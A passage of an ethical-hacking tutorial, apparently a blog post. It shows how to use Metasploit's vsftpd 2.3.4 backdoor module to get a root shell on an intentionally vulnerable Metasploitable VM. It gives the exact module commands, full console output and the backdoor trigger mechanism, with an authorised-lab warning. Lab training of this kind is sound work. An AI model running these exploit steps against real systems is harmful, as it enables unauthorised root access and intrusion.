📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
🧪 METASPLOITABLE LAB SERIESFREE
Part of the Metasploitable Lab Series
Lab 4 of 10 · 40% complete
⚠️ Authorised Lab Only. This lab exploits a real vulnerability against an intentionally vulnerable target. Run only on your isolated Metasploitable VM on a host-only network. Never run Metasploit modules against any system without explicit written authorisation.
Five commands. That’s all it takes. From a blank msfconsole to a root shell on Metasploitable in under 60 seconds using the vsftpd 2.3.4 backdoor. I’m not showing you this because it’s hard — it’s not. I’m showing you this because understanding how a Metasploit module works end-to-end is the foundation for every subsequent module you’ll run. The vsftpd exploit is the simplest possible example of the complete Metasploit workflow. Learn it here, then apply the same five-command structure to every module in the series.
🎯 What You’ll Master in Metasploitable Lab 4
Navigate msfconsole and understand the module structure
Run the vsftpd 2.3.4 backdoor module to get a root shell
Use post-exploitation commands to enumerate the compromised system
Run a second module — Samba usermap_script — using the same workflow
Understand the difference between a command shell and a Meterpreter session
⏱️ 35 min · 3 exercises · Lab 4 of 10 #### ✅ Before You Start - Lab 3 — Service Enumeration — the attack matrix from Lab 3 identified vsftpd 2.3.4 as Critical priority. Today I run the exploit. Have your Metasploitable IP ready from Lab 2. - Metasploitable 2 running on host-only network · Kali Linux · msfconsole accessible ### 📋 Lab 4 — Metasploit + Metasploitable First Module 1. msfconsole — The Five-Command Workflow 2. vsftpd 2.3.4 Backdoor — Root Shell in 60 Seconds 3. Post-Exploitation — What to Do With Root Access 4. Second Module — Samba usermap_script Lab 4 is the payoff for Labs 2 and 3. The service enumeration from Lab 3 confirmed vsftpd 2.3.4 with the backdoor present. The full exploitation methodology is in the Ethical Hacking course. Use the Port Scanner Tool to confirm port 21 is open before starting.
msfconsole — The Five-Command Workflow
The five-command structure I use is identical whether I’m on Metasploitable or a real engagement target. Every Metasploit exploit follows the same five-command structure. Learning it on the simplest possible exploit (vsftpd backdoor — no payload selection, no options to configure) means when you move to complex modules with dozens of options, the structure is already familiar.
THE FIVE-COMMAND METASPLOIT WORKFLOWCopy
Step 1: Launch msfconsole
msfconsole
Step 2: Select the module
use exploit/unix/ftp/vsftpd_234_backdoor
Step 3: Configure the target
set RHOSTS TARGET_IP
Step 4: Verify options
show options
Step 5: Run the exploit
run
That’s it. Every Metasploit module follows this structure.
More complex modules add: set LHOST, set PAYLOAD, set PORT
But the core: use → set RHOSTS → show options → run
vsftpd 2.3.4 Backdoor — Root Shell in 60 Seconds
The vsftpd backdoor is the first exploit I run on every new Metasploitable session — it confirms the lab is working. The vsftpd 2.3.4 backdoor is the first exploit I run on every new Metasploitable instance. It takes under 60 seconds from msfconsole prompt to root shell. The exploit is this simple because the backdoor’s mechanism is this simple: send “:)” in the username field, connect to port 6200.
VSFTPD 2.3.4 EXPLOIT — FULL RUNCopy
msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf6 exploit > run
[] 192.168.56.101:21 – Banner: 220 (vsFTPd 2.3.4)
[] 192.168.56.101:21 – USER: 331 Please specify the password.
[+] 192.168.56.101:21 – Backdoor service has been spawned, handling…
[+] 192.168.56.101:21 – UID: uid=0(root) gid=0(root)
[] Found shell.
[] Command shell session 1 opened
id
uid=0(root) gid=0(root) groups=0(root)
securityelites.com
msfconsole — vsftpd Root Shell Obtained
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[] 192.168.56.101:21 – Banner: 220 (vsFTPd 2.3.4)
[+] 192.168.56.101:21 – Backdoor service has been spawned, handling…
[+] 192.168.56.101:21 – UID: uid=0(root) gid=0(root)
[] Command shell session 1 opened (192.168.56.100:45678 -> 192.168.56.101:6200)
id
uid=0(root) gid=0(root) groups=0(root)
→ Root access on Metasploitable. Time from msfconsole launch: 47 seconds.
📸 First Metasploit module success — root shell via vsftpd 2.3.4 backdoor. The output sequence: banner confirmation (vsFTPd 2.3.4), backdoor trigger confirmation, UID verification (uid=0 = root), and session opened on port 6200 (the backdoor’s command shell port). The session is a basic command shell, not Meterpreter — it’s fully functional but lacks the advanced post-exploitation features. Running id confirms root access. From here: the entire Metasploitable filesystem is accessible without further privilege escalation.
⚡ EXERCISE 1 — KALI TERMINAL (15 MIN · METASPLOITABLE RUNNING)
Run the vsftpd Module — Get Your First Root Shell
⏱️ 15 minutes · msfconsole
Run the five-command sequence exactly as shown. The goal: root shell confirmed with id output showing uid=0. Screenshot it. This is the moment Metasploit becomes a tool you’ve used, not just read about.
Step 1: Launch msfconsole
msfconsole -q
Wait for: msf6 >
Step 2: Select module use exploit/unix/ftp/vsftpd_234_backdoor Prompt changes to: msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Step 3: Set target set RHOSTS [YOUR_METASPLOITABLE_IP] Confirm: RHOSTS => [IP]
Step 4: Review options show options Confirm RHOSTS is set. Is RPORT default 21?
Step 5: Run it run Watch the output. Look for: [+] Backdoor service has been spawned [+] UID: uid=0(root) [*] Command shell session opened
📖 Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)